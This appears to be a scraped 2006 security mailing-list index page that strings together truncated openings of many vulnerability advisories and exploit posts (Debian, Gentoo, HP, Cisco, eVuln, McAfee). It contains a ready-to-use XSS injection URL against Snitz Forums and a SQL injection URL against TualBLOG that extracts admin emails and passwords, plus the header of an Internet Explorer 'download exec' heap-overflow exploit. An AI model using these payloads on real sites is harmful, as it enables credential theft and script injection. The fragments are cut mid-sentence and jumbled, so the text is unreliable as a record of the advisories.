-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1175-1[EMAIL PROTECTED]
http://www.debian.org/security/ Noah Meyerhans
September 13th, 2006
# ForumJBC v4 = Cross-Site Scripting - XSS Exploit ;
# Discovred By : ThE__LeO ;
# Software : ForumJBC v4 ;
# Site Of SoftWare : http://jbc.unlimited.free.fr
# Version : 4 ;
# Exploit :
Multiple Cross Site Scripting Vulnerabilities were identified in
SoftComplex Inc. 's PHP Event Calendar, a reusable PHP script that
extends a web site's functionality with an event scheduler or news
archive.
http://www.softcomplex.com/products/php_event_calendar/
Attached is the advisory which
When does php.net usually publish an official patched version on their
website, outside of cvs? One would think they should publish it soon
considering the vulnerability and exploit.
On 9/9/06, İsmail Dönmez [EMAIL PROTECTED] wrote:
Hi,
9 Eylül 2006 Cumartesi 13:24 tarihinde, [EMAIL PROTECTED]
NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities
.=[ Arif Jatmoko ]=.
Release Date : 8 July 2006
Product Affected :
- NetPerformer FRAD ACT SDM-95xx version 7.xx (R1), earlier, and
possibly newer
- NetPerformer FRAD ACT SDM-93xx version
Hi,
[EMAIL PROTECTED] schrieb am Sun, 10 Sep 2006 17:19:00 +:
+---
+ Affected Software .: Software
+ Version .: PHP Advanced Transfer Manager v1.20
+ Venedor ...: http://phpatm.free.fr/
+ Class
Panda is realy great and realy fast. The Bug was also reported at 16.07.06 to
the beta team.
16.07.06
Hi there,
i think there are some badly set filesystem permissions in your software.
FileSecure 7.01.10
C:\Programme\Panda Software\AVNT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200609-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
McAfee, Inc.
McAfee Avert(tm) Labs Security Advisory
Public Release Date: 2006-09-12
Apple QuickTime Multiple Vulnerabilities
CVE-2006-4382, CVE-2006-4384, CVE-2006-4385, CVE-2006-4386,
CVE-2006-4388, CVE-2006-4389
_
* Synopsis
===
Ubuntu Security Notice USN-345-1 September 13, 2006
mailman vulnerabilities
CVE-2006-2941, CVE-2006-3636
===
A security issue affects the following Ubuntu releases:
Ubuntu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00768665
Version: 1
HPSBUX02151 SSRT051021 rev.1 - HP-UX Running ARPA Transport Software,
Local Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00767033
Version: 1
HPSBMA02149 SSRT050968 rev.1 - HP OpenView Operations,
Remote Unauthorized Access and Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1161-2[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
September 13th, 2006
Phenoelit Advisory wir-haben-auch-mal-was-gefunden #0815 +---+
[ Title ]
Cisco Systems IOS VTP multiple vulnerabilities
[ Authors ]
FX [EMAIL PROTECTED]
Phenoelit Group (http://www.phenoelit.de)
Advisory
/*
*---
*
* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec
Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
ENGLISH
# Title : Snitz Forums 3.4.06 XSS Vulnerability
# Author : ajann
# HomePage : http://forum.snitz.com
# [CODE]
http://target.com/[path]/forum.asp?FORUM_ID=1ARCHIVE=truesortfield=lastpostsortorder=;scriptfunction%20xssbaslat(){alert(Xss%20Here);}/scriptbody%20onload=xssbaslat()
New eVuln Advisory:
Doika guestbook 'page' XSS Vulnerability
http://evuln.com/vulns/134/summary.html
Summary
eVuln ID: EV0134
CVE: CVE-2006-4325
Software: Doika guestbook
Sowtware's Web Site: http://doika.net/
Versions: 2.5
Critical Level: Harmless
Type:
New eVuln Advisory:
Links Manager Multiple XSS and SQL Injection Vulnerabilities
http://evuln.com/vulns/136/summary.html
Summary
eVuln ID: EV0136
CVE: CVE-2006-4327 CVE-2006-4328
Vendor: CloudNine Interactive
Vendor's Web Site:
New eVuln Advisory:
CJ Tag Board XSS Vulnerability
http://evuln.com/vulns/137/summary.html
Summary
eVuln ID: EV0137
Vendor: CloudNine Interactive
Vendor's Web Site: http://www.cloudnineinteractive.co.uk/
Software: Tag Board
Sowtware's Web Site:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200609-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
New eVuln Advisory:
NX5Linkx Multiple Vulnerabilities
http://evuln.com/vulns/138/summary.html
Summary
eVuln ID: EV0138
CVE: CVE-2006-4503 CVE-2006-4504 CVE-2006-4505
Vendor: NX5
Vendor's Web Site: http://nx5ware.nx5.org/
Software: NX5Linkx
Sowtware's Web Site:
# BiyoSecurity.Org
# script name : TualBLOG v 1.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp
exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
ANNOUNCING
8o, .o8o, o8 8I .888, .888, o8o o8 o8 o8 o8
88_ 88 o8_ 8o 88,_o8 88 88 88 88 888o_88 88 88 88
8o 88ooo88 8o 88 88 88 888o88 88
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
8o, .o8o, o8 8I .888, .888, o8o o8 o8 o8 o8
88_ 88 o8_ 8o 88,_o8 88 88 88 88 888o_88 88 88 88
8o 88ooo88 8o 88 88 88 888o88 88 88 88
88
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1176-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
September 13th, 2006
.
An official response is located at:
http://www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml
These vulnerabilities are addressed by Cisco bug IDs:
* CSCsd52629/CSCsd34759 -- VTP version field DoS
* CSCse40078/CSCse47765 -- Integer Wrap in VTP revision
* CSCsd34855/CSCei54611
26 matches
Mail list logo